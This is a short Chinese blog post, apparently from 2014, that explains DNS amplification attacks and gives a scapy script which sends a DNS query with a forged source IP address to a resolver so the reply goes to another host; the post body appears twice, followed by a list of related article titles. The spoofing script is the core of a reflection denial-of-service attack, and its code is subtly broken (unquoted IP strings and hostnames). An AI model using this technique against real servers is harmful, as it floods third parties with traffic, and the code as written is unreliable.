用scapy模拟DNS放大***
2014-04-07 19:00
183 查看
首先,DNS放大***,简单解释有两点:
1.伪造源IP为其他人的ip地址
2.被请求的记录,要求比较大,比如TXT格式,4000KB
在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大***。
可以用python的scapy模拟:
from scapy import *
a = IP(dst=10.32.8.11,src=10.32.132.85) #10.32.132.85即为伪造的源ip
b = UDP(dport=53)
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname=www.qq.com,qtype=1,qclass=1)
p = a/b/c
send(p)
模拟结束。
在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。
---------------------------------------------------------------------------
低调的python小子
1.伪造源IP为其他人的ip地址
2.被请求的记录,要求比较大,比如TXT格式,4000KB
在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大***。
可以用python的scapy模拟:
from scapy import *
a = IP(dst=10.32.8.11,src=10.32.132.85) #10.32.132.85即为伪造的源ip
b = UDP(dport=53)
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname=www.qq.com,qtype=1,qclass=1)
p = a/b/c
send(p)
模拟结束。
在10.32.132.85上抓dns的包,就会收到一条DNS响应,是10.32.8.11发来的。
---------------------------------------------------------------------------
低调的python小子
相关文章推荐
- 用scapy模拟DNS放大攻击
- Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
- Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
- MDNS的漏洞报告——mdns的最大问题是允许广域网的mdns单播查询,这会暴露设备信息,或者被利用用于dns放大攻击
- 【安全牛学习笔记】DNS放大攻击
- 防止DNS放大攻击的有效措施
- DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器
- DNS Amplification Attack PoC(DNS放大攻击)
- 使用bind新功能rate-limit防止DNS放大攻击和流量攻击
- Cloudflare 宣布虚拟 DNS 以防御 DNS 放大攻击
- 理解DNS放大攻击
- MDNS DDoS 反射放大攻击——攻击者假冒被攻击者IP向网络发送DNS请求,域名为“_services._dns-sd._udp.local”,这将引起本地网络中所有提供服务的主机都向被攻击者IP发送DNS响应,列举网络中所有服务
- 通过Spamhaus事件认识DNS反射放大***
- 把文字绘制在创建好的Image,然后放大缩小该Image
- linux DNS 设置
- 打造私有的DNS 服务
- 放大缩放图片
- 转帖:从百度被攻击事件浅谈 DNS 攻击
- 简单的配置dnsmasq作为本地dns缓存层
- DNS.py――DNS查询信息